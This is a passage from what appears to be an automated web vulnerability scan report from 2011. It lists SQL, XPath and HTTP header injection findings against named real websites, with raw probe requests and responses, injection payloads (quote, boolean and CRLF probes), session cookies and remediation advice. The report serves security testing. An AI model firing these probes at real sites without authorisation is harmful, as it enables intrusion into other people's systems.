Host:	http://www.soundingsonline.com
Path:	/subscription-services

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.193. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/preview-current-issue?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/preview-current-issue?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.194. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/subscribe-to-e-newsletter

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/subscribe-to-e-newsletter?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/subscribe-to-e-newsletter?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.195. http://www.woothemes.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.woothemes.com
Path:	/

Issue detail

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:11:06 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 26001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
<p>We love the ability to make little tweaks to the themes and away we go! Drop in great content and let the Woo Framework do the rest. Also, the ability to apply different looks as the new themes continue roll out! Splendid Woo Ninja forum support. If you sold those cute woo dolls, I...d buy one!</p></blockquote><div class="author"> <img alt='' src='http://1.gravatar.com/avatar/da1ea33c317a366d03ea9366626bc570?s=30&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D30&r=G' class='avatar avatar-30 photo' height='30' width='30' /><p class="name">Kristi</p><p class="site"><a href="http://yaalife.com">YaaLife</a></p></div><div class="fix"></div></div><div id="steps"><div class="steps-steps"> <a href="http://www.woothemes.com/themes/" title="Browse our Themes Gallery to find the themes that you like best. View the demos and try the themes in our Playground." class="step-single steps-1 tiptip"></a> <a href="http://www.woothemes.com/pricing/" title="Once you've picked your themes, choose the Theme Package that best suits you, or subscribe to our WordPress Themes Club to get all our WordPress themes." class="step-single steps-2 tiptip"></a> <a href="http://www.wordpress.org" title="If you haven't already done so, download WordPress and install it on your web server. Then upload and activate your theme by following our documentation." class="step-single steps-3 tiptip"></a> <a href="http://www.woothemes.com/support/" title="Set up your new WooTheme with the options panel - customizing the look and feel of your website with ease. Ask for help in our support forum where one of our WooNinjas will assist you." class="step-single steps-4 tiptip"></a></div><div class="info-box"> <a href="http://www.woothemes.com/the-woothemes-club/">See our Pricing Options</a> <span style="font-size:14px; font-weight:bold; padding:0 5px;">OR</span> <a href="http://www.woothemes.com/themes/">View our Theme Collection</a></div></div><div id="news"><div id="blog
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:11:07 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 25873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
<p>The WooThemes team just gets ...it.... ...It... being customer service, audience targetting; what people need and what people want all at the same time.</p></blockquote><div class="author"> <img alt='' src='http://1.gravatar.com/avatar/d8cfb29a7cf26b7bad6469f357604f93?s=30&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D30&r=G' class='avatar avatar-30 photo' height='30' width='30' /><p class="name">Gavin Elliott</p><p class="site"><a href="http://www.gavinelliott.co.uk">Website</a></p></div><div class="fix"></div></div><div id="steps"><div class="steps-steps"> <a href="http://www.woothemes.com/themes/" title="Browse our Themes Gallery to find the themes that you like best. View the demos and try the themes in our Playground." class="step-single steps-1 tiptip"></a> <a href="http://www.woothemes.com/pricing/" title="Once you've picked your themes, choose the Theme Package that best suits you, or subscribe to our WordPress Themes Club to get all our WordPress themes." class="step-single steps-2 tiptip"></a> <a href="http://www.wordpress.org" title="If you haven't already done so, download WordPress and install it on your web server. Then upload and activate your theme by following our documentation." class="step-single steps-3 tiptip"></a> <a href="http://www.woothemes.com/support/" title="Set up your new WooTheme with the options panel - customizing the look and feel of your website with ease. Ask for help in our support forum where one of our WooNinjas will assist you." class="step-single steps-4 tiptip"></a></div><div class="info-box"> <a href="http://www.woothemes.com/the-woothemes-club/">See our Pricing Options</a> <span style="font-size:14px; font-weight:bold; padding:0 5px;">OR</span> <a href="http://www.woothemes.com/themes/">View our Theme Collection</a></div></div><div id="news"><div id="blog"><h3><a class="feed" href="http://feeds.feedburner.com/WooThemes" title="Subribe to our RSS feed"><img src="http://cdn.wootheme
...[SNIP]...

2. XPath injection previous next
There are 6 instances of this issue:

http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter]
http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html [REST URL parameter 1]
http://www.facebook.com/miofeghali [wd cookie]
http://www.w3.org/TR [Referer HTTP header]
http://www.w3.org/TR [User-Agent HTTP header]
http://www.w3.org/TR [name of an arbitrarily supplied request parameter]

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

2.1. http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sourceforge.net
Path:	/softwaremap/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /softwaremap/?1'=1 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-5
Set-Cookie: PHPSESSID=c455a0b20479018315450130b7f1284c; expires=Mon, 07-Feb-2011 16:03:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:03:13 GMT
Server: lighttpd/1.4.26
Content-Length: 77436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
~ SourceForge.net: Find and B
...[SNIP]...
<a href="/softwaremap/?1'=1&fq%5B%5D=trove%3A560">XSL (XSLT/XPath/XSL-FO)</a>
...[SNIP]...

2.2. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.eraser.ee
Path:	/uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /uudised'/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=2f6c7bfae834a40abca6058888b42660; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:05:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...
function(toolTip) {
this.fx.start(1);
},
onHide: function(toolTip) {
this.fx.start(0);
}
});
});var rokboxPath = '/plugins/system/rokbox/';InputsExclusion.push('.content_vote')
</script>
...[SNIP]...

2.3. http://www.facebook.com/miofeghali [wd cookie] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/miofeghali

Issue detail

The wd cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the wd cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80%2527; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response (redirected)

2.4. http://www.w3.org/TR [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /TR HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:00 GMT
Server: Apache/2
Content-Location: Overview.html
Vary: negotiate,accept-encoding
TCN: choice
Last-Modified: Thu, 20 Jan 2011 15:34:42 GMT
ETag: "896a7-49a48df542880;9d-48046fe28dec0"
Accept-Ranges: bytes
Content-Length: 562855
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:51:00 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a title="Delivery Context: XPath Access Functions 1.0 publication history" href="/standards/history/cselection-xaf">
...[SNIP]...

2.5. http://www.w3.org/TR [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /TR HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:53 GMT
Server: Apache/2
Content-Location: Overview.html
Vary: negotiate,accept-encoding
TCN: choice
Last-Modified: Thu, 20 Jan 2011 15:34:42 GMT
ETag: "896a7-49a48df542880;9d-48046fe28dec0"
Accept-Ranges: bytes
Content-Length: 562855
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:50:53 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a title="Delivery Context: XPath Access Functions 1.0 publication history" href="/standards/history/cselection-xaf">
...[SNIP]...

2.6. http://www.w3.org/TR [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR

Issue detail

Request

GET /TR?1'=1 HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:48 GMT
Server: Apache/2
Content-Location: Overview.html
Vary: negotiate,accept-encoding
TCN: choice
Last-Modified: Thu, 20 Jan 2011 15:34:42 GMT
ETag: "896a7-49a48df542880;9d-48046fe28dec0"
Accept-Ranges: bytes
Content-Length: 562855
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:50:48 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a title="Delivery Context: XPath Access Functions 1.0 publication history" href="/standards/history/cselection-xaf">
...[SNIP]...

3. HTTP header injection previous next
There are 15 instances of this issue:

http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3 [REST URL parameter 1]
http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363 [REST URL parameter 1]
http://ad.doubleclick.net/adj/fmpub.tweetmeme/ [REST URL parameter 1]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [REST URL parameter 1]
http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [name of an arbitrarily supplied request parameter]
http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4]
http://kickapps.yuku.com/kickapps/service/getWidget.kickAction [REST URL parameter 1]
http://rd.apmebf.com/w/pg [REST URL parameter 1]
http://rd.apmebf.com/w/pg [REST URL parameter 2]
http://rd.apmebf.com/w/pg [S cookie]
http://segnalo.alice.it/post.html.php [REST URL parameter 1]
http://tacoda.at.atwola.com/rtx/r.js [N cookie]
http://tacoda.at.atwola.com/rtx/r.js [si parameter]
http://www.myproductadvisor.com/mpa/autobytel/setCookie.do [REST URL parameter 2]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6061.194450.CDN.TURN.COM/B4419610.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14a95%0d%0a79f68532ca4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14a95%0d%0a79f68532ca4/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14a95
79f68532ca4/N6061.194450.CDN.TURN.COM/B4419610.3%3Bsz%3D468x60%3Bord%3D3442293584429726933:
Date: Tue, 25 Jan 2011 04:26:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4319.AOL/B2387887.363

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83d20%0d%0a1d229ae03b9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83d20%0d%0a1d229ae03b9/N4319.AOL/B2387887.363 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83d20
1d229ae03b9/N4319.AOL/B2387887.363:
